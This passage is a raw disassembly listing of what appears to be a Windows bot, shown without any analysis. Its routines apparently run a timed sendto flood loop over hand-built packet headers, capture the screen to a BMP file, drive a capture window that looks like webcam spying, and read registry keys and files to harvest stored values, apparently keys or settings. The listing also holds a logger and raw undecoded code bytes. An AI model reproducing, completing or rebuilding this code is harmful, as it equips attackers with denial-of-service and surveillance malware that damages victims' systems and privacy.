jnz short loc_417AF4
call sub_41B325
pop ecx
pop ecx
push eax
call ds:dword_444260 ; htons
mov ds:word_4D5CF4, ax
mov eax, ds:dword_4D5CEC
mov ds:dword_4D5CBC, eax
mov ds:byte_4D5D01, 2
mov ds:dword_4D5CFC, ebx
jmp short loc_417B11
; ---------------------------------------------------------------------------
loc_417AF4: ; CODE XREF: sub_41776E+357�j
mov ds:byte_4D5D01, 10h
call sub_41B325
pop ecx
pop ecx
push eax
call ds:dword_444260 ; htons
movzx eax, ax
mov ds:dword_4D5CFC, eax
loc_417B11: ; CODE XREF: sub_41776E+384�j
inc ds:word_4D5CE4
inc ds:dword_4D5CF8
mov ax, ds:word_4D5CF6
push 5
pop ecx
mov ds:word_4D5CEA, bx
mov ds:word_4D5D04, bx
mov esi, offset word_4D5CF4
mov edi, offset dword_4D5CC8
rep movsd
push 14h
mov esi, offset byte_4D5CE0
push esi
mov ds:word_4D5D0E, ax
call sub_402422
push 20h
push offset dword_4D5CBC
mov ds:word_4D5CEA, ax
call sub_402422
add esp, 10h
push 10h
push offset word_4D5D0C
push ebx
push 28h
push esi
push ds:dword_4D5D20
mov ds:word_4D5D04, ax
call ds:dword_4440CC ; sendto
inc [ebp+6Ch+var_4]
cmp [ebp+6Ch+var_4], 3FFh
jl loc_417ABB
call ds:dword_42B038 ; GetTickCount
sub eax, [ebp+6Ch+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+6Ch+arg_4]
ja short loc_417BBB
push [ebp+6Ch+arg_8]
call ds:dword_42B014 ; Sleep
jmp loc_41798E
; ---------------------------------------------------------------------------
loc_417BBB: ; CODE XREF: sub_41776E+43D�j
pop edi
pop esi
mov eax, offset dword_4D5D28
pop ebx
add ebp, 6Ch
leave
retn
sub_41776E endp
; ---------------------------------------------------------------------------
loc_417BC8: ; DATA XREF: sub_40274D+605C�o
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+8]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp-214h]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp-110h]
push eax
call sub_41E7AD
pop ecx
push eax
lea eax, [ebp-190h]
push eax
call sub_41E7AD
pop ecx
push eax
lea eax, [ebp-210h]
push eax
call ds:dword_44417C ; inet_addr
push eax
call sub_41776E
push eax
lea eax, [ebp-414h]
push offset unk_435B54
push eax
call sub_41E6A6
xor esi, esi
add esp, 18h
cmp [ebp-8], esi
jnz short loc_417C5A
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-414h]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-214h]
call sub_40123B
add esp, 14h
loc_417C5A: ; CODE XREF: seg000:00417C38�j
lea eax, [ebp-414h]
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C78 proc near ; CODE XREF: sub_40274D+6E31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_4D1450
mov edi, 0B8h
loc_417C8C: ; CODE XREF: sub_417C78+33�j
cmp byte ptr [esi], 0
jz short loc_417CAF
push [ebp+arg_0]
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_417CAF
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_4D1FD0
jl short loc_417C8C
jmp short loc_417CF1
; ---------------------------------------------------------------------------
loc_417CAF: ; CODE XREF: sub_417C78+17�j
; sub_417C78+26�j
mov esi, [ebp+var_4]
imul esi, 0B8h
push ebx
push edi
lea ebx, dword_4D1450[esi]
push 0
push ebx
call sub_41E5F0
push 17h
push [ebp+arg_0]
push ebx
call sub_41E860
push 9Fh
push [ebp+arg_4]
lea eax, dword_4D1468[esi]
push eax
call sub_41E860
add esp, 24h
inc ds:dword_43C4A0
pop ebx
loc_417CF1: ; CODE XREF: sub_417C78+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_417C78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CF8 proc near ; CODE XREF: sub_40274D+26BC�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_435B94
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 14h
xor edi, edi
mov esi, offset dword_4D1450
loc_417D22: ; CODE XREF: sub_417CF8+72�j
cmp byte ptr [esi], 0
jz short loc_417D5D
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_435B80
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41E6FE
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 2Ch
loc_417D5D: ; CODE XREF: sub_417CF8+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_4D1FD0
jl short loc_417D22
pop edi
pop esi
leave
retn
sub_417CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D70 proc near ; CODE XREF: sub_401F92+320�p
; sub_4022F5+B5�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_42B0D4 ; GetLocalTime
mov ebx, offset dword_4DA128
mov edi, 80h
mov esi, offset dword_4D6128
loc_417D92: ; CODE XREF: sub_417D70+3D�j
cmp byte ptr [ebx], 0
jz short loc_417DA9
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_41E860
add esp, 0Ch
loc_417DA9: ; CODE XREF: sub_417D70+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_417D92
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41E6FE
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_417D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DE4 proc near ; CODE XREF: sub_4025EF+BA�p
; sub_40274D+6DAA�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_41E650
lea eax, [ebp+var_80]
push eax
call sub_417D70
add esp, 14h
leave
retn
sub_417DE4 endp
; =============== S U B R O U T I N E =======================================
sub_417E10 proc near ; CODE XREF: sub_40274D+25BD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_4D6128
xor ecx, ecx
loc_417E17: ; CODE XREF: sub_417E10+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_4DA128
jl short loc_417E17
cmp [esp+arg_C], ecx
jnz short loc_417E45
push ecx
push [esp+4+arg_8]
push offset dword_435BE0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40123B
add esp, 14h
loc_417E45: ; CODE XREF: sub_417E10+19�j
push offset dword_435BCC
call sub_417D70
pop ecx
retn
sub_417E10 endp
; ---------------------------------------------------------------------------
byte_417E51 db 55h, 8Dh, 6Ch ; DATA XREF: sub_40274D+266A�o
dd 0EC818C24h, 31Ch, 567C458Bh, 59456A57h, 0BD8DF08Bh
dd 0FFFFFF58h, 0FF33A5F3h, 3947D233h, 45C76455h, 806Ch
dd 70558900h, 110B889h, 1E750000h, 6075FF52h, 0FF5C858Dh
dd 1068FFFFh, 5000435Ch, 0FF58B5FFh, 98E8FFFFh, 83FFFE93h
dd 7D8014C4h, 147400DCh, 50DC458Dh, 68F8E8h, 59C08500h
dd 74704589h, 6C458903h, 7C6583h, 4D6128BEh, 7C458B00h
dd 7D6C453Bh, 3E804Ch, 7D803674h, 167400DCh, 707D83h, 458D1075h
dd 0E85650DCh, 34B3h, 5959C085h, 0FF571A74h, 858D6075h
dd 0FFFFFF5Ch, 0B5FF5056h, 0FFFFFF58h, 0FE9332E8h, 14C483FFh
dd 817C45FFh, 80C6h, 28FE8100h, 7C004DA1h, 58858DACh, 68FFFFFDh
dd 435BF4h, 6778E850h, 0F6330000h, 59647539h, 56207559h
dd 8D6075FFh, 0FFFD5885h, 858D50FFh, 0FFFFFF5Ch, 58B5FF50h
dd 0E8FFFFFFh, 0FFFE92E7h, 8D14C483h, 0FFFD5885h, 0DE850FFh
dd 0FFFFFFFEh, 0DEE85C75h, 59FFFF31h, 15FF5659h, 42B068h
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_417F75 proc near ; CODE XREF: sub_40274D+6F5D�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 484h
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_444250 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+74h+var_20], edi
jnz short loc_417FA2
xor eax, eax
jmp loc_4181AB
; ---------------------------------------------------------------------------
loc_417FA2: ; CODE XREF: sub_417F75+24�j
push ebx
push 8
push edi
call ds:dword_444178 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+74h+var_C], eax
call ds:dword_444178 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+74h+var_4], eax
call ds:dword_444178 ; GetDeviceCaps
cmp eax, 8
mov [ebp+74h+var_10], eax
ja short loc_417FDC
push 18h
push edi
call ds:dword_444178 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_417FDE
; ---------------------------------------------------------------------------
loc_417FDC: ; CODE XREF: sub_417F75+55�j
xor ebx, ebx
loc_417FDE: ; CODE XREF: sub_417F75+65�j
push edi
call ds:dword_444180 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+74h+var_8], eax
jz loc_41818D
mov eax, [ebp+74h+var_C]
mov [ebp+74h+var_80], eax
mov eax, [ebp+74h+var_4]
mov [ebp+74h+var_7C], eax
mov ax, word ptr [ebp+74h+var_10]
push esi
push esi
mov [ebp+74h+var_76], ax
lea eax, [ebp+74h+var_18]
push eax
push 1
lea eax, [ebp+74h+var_84]
push eax
push edi
mov [ebp+74h+var_84], 28h
mov [ebp+74h+var_78], 1
mov [ebp+74h+var_74], esi
mov [ebp+74h+var_70], esi
mov [ebp+74h+var_6C], esi
mov [ebp+74h+var_68], esi
mov [ebp+74h+var_64], ebx
mov [ebp+74h+var_60], ebx
call ds:dword_44421C ; CreateDIBSection
cmp eax, esi
mov [ebp+74h+var_1C], eax
jz loc_418198
push eax
push [ebp+74h+var_8]
call ds:dword_44408C ; SelectObject
cmp eax, esi
jz loc_418198
cmp eax, 0FFFFFFFFh
jz loc_418198
push 0CC0020h
push esi
push esi
push edi
push [ebp+74h+var_4]
push [ebp+74h+var_C]
push esi
push esi
push [ebp+74h+var_8]
call ds:dword_444190 ; BitBlt
test eax, eax
jz loc_418198
cmp ebx, esi
jz short loc_418095
lea eax, [ebp+74h+var_484]
push eax
push ebx
push esi
push [ebp+74h+var_8]
call ds:dword_4441C0 ; GetDIBColorTable
mov ebx, eax
loc_418095: ; CODE XREF: sub_417F75+10A�j
mov edi, [ebp+74h+var_10]
imul edi, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_C]
imul edi, ecx
push esi
push 80h
push 2
mov eax, ebx
shl eax, 2
mov [ebp+74h+var_C], eax
shr edi, 3
lea edx, [eax+edi+36h]
add eax, 36h
push esi
mov [ebp+74h+var_26], eax
mov eax, [ebp+74h+var_4]
push esi
push 40000000h
push [ebp+74h+arg_0]
mov [ebp+74h+var_50], eax
mov ax, word ptr [ebp+74h+var_10]
mov [ebp+74h+var_30], 4D42h
mov [ebp+74h+var_2E], edx
mov [ebp+74h+var_2A], si
mov [ebp+74h+var_28], si
mov [ebp+74h+var_58], 28h
mov [ebp+74h+var_54], ecx
mov [ebp+74h+var_4C], 1
mov [ebp+74h+var_4A], ax
mov [ebp+74h+var_48], esi
mov [ebp+74h+var_44], esi
mov [ebp+74h+var_40], esi
mov [ebp+74h+var_3C], esi
mov [ebp+74h+var_38], ebx
mov [ebp+74h+var_34], esi
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jz short loc_418178
push esi
lea ecx, [ebp+74h+var_14]
push ecx
push 0Eh
lea ecx, [ebp+74h+var_30]
push ecx
push eax
call ds:dword_42B084 ; WriteFile
push esi
lea eax, [ebp+74h+var_14]
push eax
push 28h
lea eax, [ebp+74h+var_58]
push eax
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
cmp ebx, esi
jz short loc_41815A
push esi
lea eax, [ebp+74h+var_14]
push eax
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_484]
push eax
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
loc_41815A: ; CODE XREF: sub_417F75+1CB�j
push esi
lea eax, [ebp+74h+var_14]
push eax
push edi
push [ebp+74h+var_18]
push [ebp+74h+var_4]
call ds:dword_42B084 ; WriteFile
push [ebp+74h+var_4]
call ds:dword_42B004 ; CloseHandle
xor esi, esi
inc esi
loc_418178: ; CODE XREF: sub_417F75+1A1�j
push [ebp+74h+var_1C]
call ds:dword_444184 ; DeleteObject
push [ebp+74h+var_8]
call ds:dword_444130 ; DeleteDC
mov edi, [ebp+74h+var_20]
loc_41818D: ; CODE XREF: sub_417F75+75�j
push edi
call ds:dword_444130 ; DeleteDC
mov eax, esi
jmp short loc_4181AA
; ---------------------------------------------------------------------------
loc_418198: ; CODE XREF: sub_417F75+C6�j
; sub_417F75+D8�j ...
push edi
call ds:dword_444130 ; DeleteDC
push [ebp+74h+var_8]
call ds:dword_444130 ; DeleteDC
xor eax, eax
loc_4181AA: ; CODE XREF: sub_417F75+221�j
pop ebx
loc_4181AB: ; CODE XREF: sub_417F75+28�j
pop edi
pop esi
add ebp, 74h
leave
retn
sub_417F75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181B2 proc near ; CODE XREF: sub_40274D+7071�p
var_38 = byte ptr -38h
var_24 = dword ptr -24h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
push ds:dword_4DA128
xor ebx, ebx
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_444138
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_4181F0
mov eax, esi
jmp loc_4183A6
; ---------------------------------------------------------------------------
loc_4181F0: ; CODE XREF: sub_4181B2+35�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_41820D
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4441CC ; SendMessageA
jmp short loc_41820F
; ---------------------------------------------------------------------------
loc_41820D: ; CODE XREF: sub_4181B2+47�j
xor eax, eax
loc_41820F: ; CODE XREF: sub_4181B2+59�j
cmp eax, ebx
jnz short loc_41821A
loc_418213: ; CODE XREF: sub_4181B2+88�j
; sub_4181B2+BC�j
mov ebx, esi
jmp loc_41839B
; ---------------------------------------------------------------------------
loc_41821A: ; CODE XREF: sub_4181B2+5F�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418237
lea eax, [ebp+var_38]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4441CC ; SendMessageA
loc_418237: ; CODE XREF: sub_4181B2+71�j
cmp [ebp+var_24], ebx
jz short loc_418213
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_41825D
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
mov [ebp+var_8], eax
jmp short loc_418260
; ---------------------------------------------------------------------------
loc_41825D: ; CODE XREF: sub_4181B2+98�j
mov [ebp+var_8], ebx
loc_418260: ; CODE XREF: sub_4181B2+A9�j
push [ebp+var_8]
call sub_41E5D3
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
jz short loc_418213
push [ebp+var_8]
call sub_41E5D3
mov esi, eax
cmp esi, ebx
pop ecx
jnz short loc_418287
xor ebx, ebx
inc ebx
jmp loc_41839B
; ---------------------------------------------------------------------------
loc_418287: ; CODE XREF: sub_4181B2+CB�j
push [ebp+var_4]
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_4182A4
push [ebp+var_C]
push [ebp+var_8]
push edi
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_4182A4: ; CODE XREF: sub_4181B2+E0�j
push [ebp+var_8]
push [ebp+var_C]
push esi
call sub_41F400
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4182BF
mov ecx, 280h
loc_4182BF: ; CODE XREF: sub_4181B2+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_4182CB
mov eax, 1E0h
loc_4182CB: ; CODE XREF: sub_4181B2+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_444084 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_418315
push esi
push [ebp+var_8]
push edi
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_418315: ; CODE XREF: sub_4181B2+153�j
push [ebp+var_4]
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418332
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_418332: ; CODE XREF: sub_4181B2+16E�j
push [ebp+var_4]
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418351
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_418351: ; CODE XREF: sub_4181B2+18B�j
push [ebp+var_4]
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_41836E
push [ebp+var_C]
push [ebp+var_8]
push edi
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_41836E: ; CODE XREF: sub_4181B2+1AA�j
push [ebp+var_C]
call sub_41E2A1
push esi
call sub_41E2A1
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_41839B
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_4441CC ; SendMessageA
loc_41839B: ; CODE XREF: sub_4181B2+63�j
; sub_4181B2+D0�j ...
push [ebp+var_4]
call ds:dword_4440F8 ; DestroyWindow
mov eax, ebx
loc_4183A6: ; CODE XREF: sub_4181B2+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4181B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4183AB proc near ; CODE XREF: sub_40274D+7120�p
var_94 = byte ptr -94h
var_80 = dword ptr -80h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 94h
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
push ds:dword_4DA128
xor ebx, ebx
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_444138
mov edi, eax
cmp edi, ebx
jnz short loc_4183E9
mov eax, esi
jmp loc_4185E5
; ---------------------------------------------------------------------------
loc_4183E9: ; CODE XREF: sub_4183AB+35�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418406
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4441CC ; SendMessageA
jmp short loc_418408
; ---------------------------------------------------------------------------
loc_418406: ; CODE XREF: sub_4183AB+47�j
xor eax, eax
loc_418408: ; CODE XREF: sub_4183AB+59�j
cmp eax, ebx
jnz short loc_418413
loc_41840C: ; CODE XREF: sub_4183AB+8B�j
; sub_4183AB+BC�j
mov ebx, esi
jmp loc_4185DC
; ---------------------------------------------------------------------------
loc_418413: ; CODE XREF: sub_4183AB+5F�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418433
lea eax, [ebp+var_94]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4441CC ; SendMessageA
loc_418433: ; CODE XREF: sub_4183AB+71�j
cmp [ebp+var_80], ebx
jz short loc_41840C
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418456
push ebx
push ebx
push 42Ch
push edi
call ds:dword_4441CC ; SendMessageA
mov [ebp+var_4], eax
jmp short loc_418459
; ---------------------------------------------------------------------------
loc_418456: ; CODE XREF: sub_4183AB+96�j
mov [ebp+var_4], ebx
loc_418459: ; CODE XREF: sub_4183AB+A9�j
push [ebp+var_4]
call sub_41E5D3
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_41840C
push [ebp+var_4]
call sub_41E5D3
mov esi, eax
cmp esi, ebx
pop ecx
jnz short loc_418480
xor ebx, ebx
inc ebx
jmp loc_4185DC
; ---------------------------------------------------------------------------
loc_418480: ; CODE XREF: sub_4183AB+CB�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_41849D
push [ebp+var_8]
push [ebp+var_4]
push 42Ch
push edi
call ds:dword_4441CC ; SendMessageA
loc_41849D: ; CODE XREF: sub_4183AB+DE�j
push [ebp+var_4]
push [ebp+var_8]
push esi
call sub_41F400
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4184B8
mov ecx, 0A0h
loc_4184B8: ; CODE XREF: sub_4183AB+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_4184C2
push 78h
pop eax
loc_4184C2: ; CODE XREF: sub_4183AB+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418507
push esi
push [ebp+var_4]
push 42Dh
push edi
call ds:dword_4441CC ; SendMessageA
loc_418507: ; CODE XREF: sub_4183AB+14A�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418524
lea eax, [ebp+var_68]
push eax
push 60h
push 441h
push edi
call ds:dword_4441CC ; SendMessageA
loc_418524: ; CODE XREF: sub_4183AB+165�j
push edi
mov [ebp+var_64], ebx
mov [ebp+var_40], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], 1
mov [ebp+var_30], 5
mov [ebp+var_68], 1046Ah
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418562
lea eax, [ebp+var_68]
push eax
push 60h
push 440h
push edi
call ds:dword_4441CC ; SendMessageA
loc_418562: ; CODE XREF: sub_4183AB+1A3�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_41857D
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_4441CC ; SendMessageA
loc_41857D: ; CODE XREF: sub_4183AB+1C0�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_418596
push ebx
push ebx
push 43Eh
push edi
call ds:dword_4441CC ; SendMessageA
loc_418596: ; CODE XREF: sub_4183AB+1DB�j
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_4185B3
push [ebp+var_8]
push [ebp+var_4]
push 42Dh
push edi
call ds:dword_4441CC ; SendMessageA
loc_4185B3: ; CODE XREF: sub_4183AB+1F4�j
push [ebp+var_8]
call sub_41E2A1
push esi
call sub_41E2A1
pop ecx
pop ecx
push edi
call ds:dword_444084 ; IsWindow
test eax, eax
jz short loc_4185DC
push ebx
push ebx
push 40Bh
push edi
call ds:dword_4441CC ; SendMessageA
loc_4185DC: ; CODE XREF: sub_4183AB+63�j
; sub_4183AB+D0�j ...
push edi
call ds:dword_4440F8 ; DestroyWindow
mov eax, ebx
loc_4185E5: ; CODE XREF: sub_4183AB+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4183AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185EA proc near ; CODE XREF: sub_40274D+23F1�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp ds:off_442AA4, ebx
mov [ebp+var_C], 80h
jz loc_418796
push esi
push edi
mov eax, offset off_442AA4
mov esi, offset dword_442AB0
mov edi, offset dword_436A1C
loc_41861A: ; CODE XREF: sub_4185EA+1A4�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_444238 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_4440B8 ; RegQueryValueExA
test eax, eax
jnz loc_41877D
mov eax, [esi]
cmp eax, ebx
jz loc_418741
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_41E6A6
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_41E54E
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_41877D
push eax
jmp short loc_4186AA
; ---------------------------------------------------------------------------
loc_418695: ; CODE XREF: sub_4185EA+D0�j
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_4186BE
push [ebp+var_8]
loc_4186AA: ; CODE XREF: sub_4185EA+A9�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41EA5D
add esp, 0Ch
test eax, eax
jnz short loc_418695
jmp short loc_418736
; ---------------------------------------------------------------------------
loc_4186BE: ; CODE XREF: sub_4185EA+BB�j
push 3Dh
push dword ptr [esi+4]
call sub_41EFD0
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_70]
jz short loc_4186FD
push offset asc_436A18 ; "="
push eax
call sub_41E7B2
push offset asc_436A18 ; "="
push ebx
call sub_41E7B2
push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi
push eax
call sub_41E6A6
add esp, 20h
jmp short loc_418711
; ---------------------------------------------------------------------------
loc_4186FD: ; CODE XREF: sub_4185EA+E5�j
push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi
push eax
call sub_41E6A6
add esp, 10h
loc_418711: ; CODE XREF: sub_4185EA+111�j
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_2F0]
push eax
call sub_417D70
add esp, 18h
loc_418736: ; CODE XREF: sub_4185EA+D2�j
push [ebp+var_8]
call sub_41E24B
pop ecx
jmp short loc_41877D
; ---------------------------------------------------------------------------
loc_418741: ; CODE XREF: sub_4185EA+6A�j
lea eax, [ebp+var_F0]
